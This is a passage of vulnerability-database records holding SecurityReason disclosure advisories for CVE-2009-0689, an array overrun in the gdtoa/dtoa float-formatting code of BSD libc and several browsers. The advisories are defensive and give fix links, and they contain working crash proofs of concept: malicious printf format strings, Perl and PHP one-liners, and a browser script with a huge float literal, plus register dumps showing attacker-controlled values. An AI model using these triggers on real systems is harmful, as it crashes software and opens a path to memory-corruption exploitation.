rtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2G8ACgkQpiCeOKaYa9YMzACgwvAI8oo1UP6GwlmGq3m+gkHm\r\nmVoAnArUxHXAPkrpEPOOLi4X99l5sAFh\r\n=VtH9\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22814", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22814", "title": "Opera 10.01 Remote Array Overrun &#40;Arbitrary code execution&#41;", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Multiple Vendors libc/gdtoa printf&#40;3&#41; Array Overrun ]\r\n\r\nAuthor: Maksymilian Arciemowicz\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 25.06.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\n\r\nAffected Software &#40;12.06.2009&#41;:\r\n- - OpenBSD 4.5\r\n- - NetBSD 5.0\r\n- - FreeBSD 7.2/6.4\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\n\r\n- --- 0.Description ---\r\nWeek after the release of new version OpenBSD and NetBSD, our research\r\nteam has checked a new implementation of gdtoa\r\n\r\nhttp://openbsd.org/45.html\r\n\r\n- ---\r\nA new version of the gdtoa code has been integrated, bringing better C99\r\nsupport to printf&#40;3&#41; and friends.\r\n- ---\r\n\r\nMore:\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/\r\n\r\n- --- 1. Multiple Vendors libc/gdtoa printf&#40;3&#41; Array Overrun ---\r\nThe main problem exists in new dtoa implementation.\r\n\r\nasprintf&#40;3&#41; will crash for asprintf&#40;ssij, &quot;&#37;0.262159f&quot;,x&#41;\r\n\r\nwhere x != 0\r\n\r\nthe behavior is correct for 262158\r\n\r\nLet&#39;s see:\r\n\r\n&#40;gdb&#41; r\r\nStarting program: /cxib/C/check\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xbbbb79d9 in __Balloc_D2A &#40;&#41; from /usr/lib/libc.so.12\r\n&#40;gdb&#41; bt\r\n#0 0xbbbb79d9 in __Balloc_D2A &#40;&#41; from /usr/lib/libc.so.12\r\n#1 0xbbbab6d7 in __rv_alloc_D2A &#40;&#41; from /usr/lib/libc.so.12\r\n#2 0xbbba8db5 in __dtoa &#40;&#41; from /usr/lib/libc.so.12\r\n#3 0xbbba671f in __vfprintf_unlocked &#40;&#41; from /usr/lib/libc.so.12\r\n#4 0xbbb882e1 in asprintf &#40;&#41; from /usr/lib/libc.so.12\r\n#5 0x08048706 in main &#40;&#41; at check.c:6\r\n\r\nLet&#39;s see src/lib/libc/gdtoa/gdtoaimp.h\r\n- ---gdtoaimp.h---\r\n...\r\n#define Kmax 15\r\n...\r\n- ---gdtoaimp.h---\r\n\r\nThe maximum Kmax length is 15. If we give bigger value, like 17 &#40;edi&#41;,\r\nprogram will overrun freelist array. bss will have 0x1.\r\n\r\nCorrect reason &#40;by NetBSD&#41;:\r\n- ---gdtoaimp.h---\r\n...\r\n#define Kmax &#40;sizeof&#40;size_t&#41; &lt;&lt; 3&#41;\r\n...\r\n- ---gdtoaimp.h---\r\n\r\nWhat is wrong? This program will crash in\r\n- --- src/lib/libc/gdtoa/misc.c ---\r\n if &#40; &#40;rv = freelist[k]&#41; !=0&#41; {\r\n freelist[k] = rv-&gt;next;\r\n }\r\n else {\r\n x = 1 &lt;&lt; k;\r\n#ifdef Omit_Private_Memory\r\n rv = &#40;Bigint *&#41;MALLOC&#40;sizeof&#40;Bigint&#41; + &#40;x-1&#41;*sizeof&#40;ULong&#41;&#41;;\r\n#else\r\n len = &#40;sizeof&#40;Bigint&#41; + &#40;x-1&#41;*sizeof&#40;ULong&#41; + sizeof&#40;double&#41; - 1&#41;\r\n /sizeof&#40;double&#41;;\r\n if &#40;&#40;double *&#41;&#40;pmem_next - private_mem + len&#41; &lt;= &#40;double *&#41;PRIVATE_mem&#41; {\r\n rv = &#40;Bigint*&#41;&#40;void *&#41;pmem_next;\r\n pmem_next += len;\r\n }\r\n else\r\n rv = &#40;Bigint*&#41;MALLOC&#40;len*sizeof&#40;double&#41;&#41;;\r\n#endif\r\n if &#40;rv == NULL&#41;\r\n return NULL;\r\n rv-&gt;k = k;\r\n rv-&gt;maxwds = x;\r\n }\r\n- --- src/lib/libc/gdtoa/misc.c ---\r\n\r\nhere\r\n\r\nrv-&gt;k = k;\r\n\r\nor\r\n\r\nfreelist[k] = rv-&gt;next;\r\n\r\nA good example to show this issue is printf&#40;1&#41; program.\r\n\r\n127# printf &#37;1.262159f 1.1\r\nMemory fault &#40;core dumped&#41;\r\n\r\n127# printf &#37;11.2109999999f\r\n210919999199919999199991791199.5000000000000000000000000000000001000000000001001\r\n\r\nesi = 0x12\r\nedi = 0x1d\r\n\r\n127# printf &#37;11.2009999999f\r\n220919999199919999199991791199.5000000000000000000000000000000001000000000001001\r\n\r\nesi = 0x13\r\nedi = 0x1d\r\n\r\nwe can manipulate esi reg.\r\n\r\n127# printf &#37;11.2009999999f\r\n126768668100000000000000000000.100000000000000000000000000000000000000000000000111111111\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n__Balloc_D2A &#40;k=29&#41; at /usr/src/lib/libc/gdtoa/misc.c:59\r\n59 freelist[k] = rv-&gt;next;\r\n&#40;gdb&#41; i r\r\neax 0x20efdb04 552590084\r\necx 0x77ce2a9d 2010000029\r\nedx 0x0 0\r\nebx 0x20eff654 552597076\r\nesp 0xcfbfc2b0 0xcfbfc2b0\r\nebp 0xcfbfc2c8 0xcfbfc2c8\r\nesi 0x41414141 1094795585\r\nedi 0x1d 29\r\neip 0xf59317 0xf59317\r\neflags 0x10206 66054\r\ncs 0x2b 43\r\nss 0x33 51\r\nds 0x33 51\r\nes 0x33 51\r\nfs 0x33 51\r\ngs 0x33 51\r\n\r\nesi = 0x41414141\r\nedi = 0x1d\r\n\r\n1267686681 is value of esi reg.\r\n\r\nprogram will crash in\r\n\r\nfreelist[k] = rv-&gt;next;\r\n\r\nExample 0:\r\n- --- chujwamwmuzg.pl ---\r\n#!/usr/local/bin/perl\r\nprintf &quot;&#37;0.4194310f&quot;, 0x0.0x41414141;\r\n- --- chujwamwmuzg.pl ---\r\n\r\nPerl will crash with\r\nesi = 0x41414141\r\nedi = 0x15\r\n\r\nExample 1:\r\n127# php -r &#39;money_format&#40;&quot;&#37;0.262159n&quot;, 1.1111&#41;;&#39;\r\nMemory fault &#40;core dumped&#41;\r\n\r\nPrograms that allow you to enter/control format string, are vulnerable.\r\nWe believe that the OpenBSD source-tree have only printf&#40;1&#41; and perl&#40;1&#41;\r\naffected.\r\n\r\nFunctions like printf&#40;3&#41;, strfmon&#40;3&#41;, fprintf&#40;3&#41;, sprintf&#40;3&#41;,\r\nsnprintf&#40;3&#41;, asprintf&#40;3&#41;, vprintf&#40;3&#41;, vfprintf&#40;3&#41;, vsprintf&#40;3&#41;,\r\nvsnprintf&#40;3&#41;, vasprintf&#40;3&#41; and others, are vulnerable &#40;with new gdtoa impl.&#41;\r\nOther languages are also affected &#40; printf in perl &#41;\r\n\r\n- --- 2. Fix ---\r\nNetBSD fix:\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\n\r\n- --- 3. Greets ---\r\nChristos Zoulas\r\n\r\nsp3x Infospec Chujwamwdupe p_e_a pi3\r\n\r\n- --- 4. Contact ---\r\nAuthor: SecurityReason.com [ Maksymilian Arciemowicz ]\r\nEmail: cxib {a.t] securityreason [d0t} com\r\nGPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAkpE0R4ACgkQpiCeOKaYa9YYvwCg0fYitWkK3qzaVOmc2QfcJlxi\r\n8mcAoJbBMawOs1N7dBWT5Ge4yvuhA8ZG\r\n=ocve\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2009-06-27T00:00:00", "published": "2009-06-27T00:00:00", "id": "SECURITYVULNS:DOC:22093", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22093", "title": "[Full-disclosure] SecurityReason: Multiple Vendors libc/gdtoa printf&#40;3&#41; Array Overrun", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "Index array overflow in libc gdtoa&#40;&#41; function &#40;used by printf&#40;&#41;&#41;.", "edition": 1, "modified": "2010-01-08T00:00:00", "published": "2010-01-08T00:00:00", "id": "SECURITYVULNS:VULN:10021", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10021", "title": "BSD-based systems &#40;FreeBSD, NetBSD, OpenBSD&#41; index array overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Camino 1.6.10 Remote Array Overrun &#40;Arbitrary code execution&#41; ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 11.12.2009\r\n\r\nCVE: CVE-2009-0689\r\nCWE: CWE-119\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Camino 1.6.10\r\n\r\nFixed in:\r\n- - Camino 2.0 &lt;=\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/76\r\n\r\n\r\n- --- 0.Description ---\r\nCamino &#40;from the Spanish word camino meaning &quot;way&quot;, &quot;path&quot; or &quot;road&quot;&#41; is a free, open source,\r\nGUI-based Web browser based on Mozilla&#39;s Gecko layout engine and specifically designed for the Mac\r\nOS X operating system. In place of an XUL-based user interface used by most Mozilla-based\r\napplications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes.\r\n\r\n- --- 1. Camino 1.6.10 Remote Array Overrun &#40;Arbitrary code execution&#41; ---\r\nThe main problem exist in dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey,\r\nChrome, Opera etc.\r\nand it is the same like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good. \r\nMore information about fix for openbsd and similars SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don&#39;t checks Kmax limit, and\r\nit is possible to call 16&lt;= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept &#40;PoC&#41; ---\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat&#40;&quot;1&quot;,296450&#41;; ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nProcess: Camino [153]\r\nPath: /Volumes/Camino/Camino.app/Contents/MacOS/Camino\r\nIdentifier: org.mozilla.camino\r\nVersion: 1.6.10 &#40;1609.09.25&#41;\r\nCode Type: X86 &#40;Native&#41;\r\nParent Process: launchd [92]\r\n\r\nDate/Time: 2009-11-06 12:57:24.698 -0800\r\nOS Version: Mac OS X 10.5.6 &#40;9G55&#41;\r\nReport Version: 6\r\n\r\nException Type: EXC_BAD_ACCESS &#40;SIGSEGV&#41;\r\nException Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590\r\nCrashed Thread: 0\r\n\r\nThread 0 Crashed:\r\n0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list + 235\r\n1 libSystem.B.dylib 0x01d7710d szone_malloc + 180\r\n2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81\r\n3 libSystem.B.dylib 0x01d76fac malloc + 55\r\n4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220\r\n5 org.mozilla.camino 0x00389bac RuleHash::RuleHash&#40;int&#41; + 282\r\n6 org.mozilla.camino 0x0038ae0e\r\nnsCSSRuleProcessor::GetRuleCascade&#40;nsPresContext*&#41; + 146\r\n7 org.mozilla.camino 0x0038b215\r\nnsCSSRuleProcessor::RulesMatching&#40;PseudoRuleProcessorData*&#41; + 27\r\n8 org.mozilla.camino 0x003afbd0 EnumPseudoRulesMatching&#40;nsIStyleRuleProcessor*,\r\nvoid*&#41; + 24\r\n9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules&#40;int\r\n&#40;*&#41;&#40;nsIStyleRuleProcessor*, void*&#41;, RuleProcessorData*&#41; + 37\r\n10 org.mozilla.camino 0x003b0c77 nsStyleSet::ResolvePseudoStyleFor&#40;nsIContent*,\r\nnsIAtom*, nsStyleContext*, nsICSSPseudoComparator*&#41; + 123\r\n11 org.mozilla.camino 0x002cc924\r\nnsCSSFrameConstructor::ConstructRootFrame&#40;nsIContent*, nsIFrame**&#41; + 134\r\n12 org.mozilla.camino 0x002f617b PresShell::InitialReflow&#40;int, int&#41; + 1151\r\n13 org.mozilla.camino 0x005a90d4 nsContentSink::StartLayout&#40;int&#41; + 342\r\n14 org.mozilla.camino 0x00483354 HTMLContentSink::StartLayout&#40;&#41; + 82\r\n15 org.mozilla.camino 0x00486cb7 HTMLContentSink::OpenBody&#40;nsIParserNode const&amp;&#41;\r\n+ 193\r\n16 org.mozilla.camino 0x001a60e8 CNavDTD::OpenBody&#40;nsCParserNode const*&#41; + 54\r\n17 org.mozilla.camino 0x001a8b53 CNavDTD::HandleDefaultStartToken&#40;CToken*,\r\nnsHTMLTag, nsCParserNode*&#41; + 393\r\n18 org.mozilla.camino 0x001aa3e5 CNavDTD::HandleStartToken&#40;CToken*&#41; + 623\r\n19 org.mozilla.camino 0x001aaaa2 CNavDTD::HandleToken&#40;CToken*, nsIParser*&#41; + 1358\r\n20 org.mozilla.camino 0x001a9a4d CNavDTD::BuildModel&#40;nsIParser*, nsITokenizer*,\r\nnsITokenObserver*, nsIContentSink*&#41; + 165\r\n21 org.mozilla.camino 0x001a94ee CNavDTD::DidBuildModel&#40;unsigned int, int,\r\nnsIParser*, nsIContentSink*&#41; + 550\r\n22 org.mozilla.camino 0x001b5e28 nsParser::DidBuildModel&#40;unsigned int&#41; + 90\r\n23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse&#40;int, int, int&#41; + 661\r\n24 org.mozilla.camino 0x001b59a8 nsParser::OnStopRequest&#40;nsIRequest*,\r\nnsISupports*, unsigned int&#41; + 128\r\n25 org.mozilla.camino 0x002076a0 nsDocumentOpenInfo::OnStopRequest&#40;nsIRequest*,\r\nnsISupports*, unsigned int&#41; + 88\r\n26 org.mozilla.camino 0x000f522a nsFileChannel::OnStopRequest&#40;nsIRequest*,\r\nnsISupports*, unsigned int&#41; + 78\r\n27 org.mozilla.camino 0x000baf18 nsInputStreamPump::OnStateStop&#40;&#41; + 88\r\n28 org.mozilla.camino 0x000bb49d\r\nnsInputStreamPump::OnInputStreamReady&#40;nsIAsyncInputStream*&#41; + 133\r\n29 libxpcom_core.dylib 0x00cb7d4d nsAStreamCopier::Process&#40;&#41; + 751\r\n30 libxpcom_core.dylib 0x00c8f251 PL_HandleEvent + 21\r\n31 libxpcom_core.dylib 0x00c8f50a PL_ProcessPendingEvents + 103\r\n32 com.apple.CoreFoundation 0x014455f5 CFRunLoopRunSpecific + 3141\r\n33 com.apple.CoreFoundation 0x01445cd8 CFRunLoopRunInMode + 88\r\n34 com.apple.HIToolbox 0x02d8b2c0 RunCurrentEventLoopInMode + 283\r\n35 com.apple.HIToolbox 0x02d8b0d9 ReceiveNextEventCommon + 374\r\n36 com.apple.HIToolbox 0x02d8af4d BlockUntilNextEventMatchingListInMode + 106\r\n37 com.apple.AppKit 0x05e94d7d _DPSNextEvent + 657\r\n38 com.apple.AppKit 0x05e94630 -[NSApplication\r\nnextEventMatchingMask:untilDate:inMode:dequeue:] + 128\r\n39 com.apple.AppKit 0x05e8d66b -[NSApplication run] + 795\r\n40 com.apple.AppKit 0x05e5a8a4 NSApplicationMain + 574\r\n41 org.mozilla.camino 0x0000364c main + 196\r\n42 org.mozilla.camino 0x00002f1e _start + 216\r\n43 org.mozilla.camino 0x00002e45 start + 41\r\n\r\nThread 1:\r\n0 libSystem.B.dylib 0x01dad30a select$DARWIN_EXTSN$NOCANCEL + 10\r\n1 libnspr4.dylib 0x00d3940e poll + 258\r\n2 libnspr4.dylib 0x00d35cc6 PR_Poll + 134\r\n3 org.mozilla.camino 0x000cb897 nsSocketTransportService::Poll&#40;unsigned int*&#41; +\r\n99\r\n4 org.mozilla.camino 0x000cbe75 nsSocketTransportService::Run&#40;&#41; + 497\r\n5 libxpcom_core.dylib 0x00c91baf nsThread::Main&#40;void*&#41; + 41\r\n6 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n7 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n8 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 2:\r\n0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10\r\n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244\r\n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47\r\n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207\r\n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75\r\n5 libxpcom_core.dylib 0x00c93be2 TimerThread::Run&#40;&#41; + 74\r\n6 libxpcom_core.dylib 0x00c91baf nsThread::Main&#40;void*&#41; + 41\r\n7 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n8 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n9 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 3:\r\n0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10\r\n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244\r\n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47\r\n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207\r\n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75\r\n5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc&#40;void*&#41; + 145\r\n6 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n7 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n8 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 4:\r\n0 libSystem.B.dylib 0x01d7d3ae __semwait_signal + 10\r\n1 libSystem.B.dylib 0x01da7d0d pthread_cond_wait$UNIX2003 + 73\r\n2 com.apple.QuartzCore 0x052c6ab9 fe_fragment_thread + 54\r\n3 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n4 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 5:\r\n0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10\r\n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244\r\n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47\r\n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207\r\n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75\r\n5 org.mozilla.camino 0x000d43ce nsHostResolver::GetHostToLookup&#40;nsHostRecord**&#41;\r\n+ 212\r\n6 org.mozilla.camino 0x000d4b2d nsHostResolver::ThreadFunc&#40;void*&#41; + 123\r\n7 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n8 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n9 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 6:\r\n0 libSystem.B.dylib 0x01dc56f2 select$DARWIN_EXTSN + 10\r\n1 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n2 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 7:\r\n0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10\r\n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244\r\n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47\r\n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207\r\n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75\r\n5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc&#40;void*&#41; + 145\r\n6 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n7 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n8 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 0 crashed with X86 Thread State &#40;32-bit&#41;:\r\n eax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590\r\n edi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190\r\n ss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017\r\n ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037\r\n cr2: 0x7e33d590\r\n\r\n- --- 3. SecurityReason Note ---\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - Mozilla Thunderbird\r\n- - Mozilla Sunbird\r\n- - Mozilla Camino\r\n- - KDE &#40;example: konqueror&#41;\r\n- - Opera\r\n- - K-Meleon\r\n- - F-Lock\r\n\r\nThis list is not yet closed. \r\n\r\n- --- 4. Fix ---\r\nNetBSD fix &#40;optimal&#41;:\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com 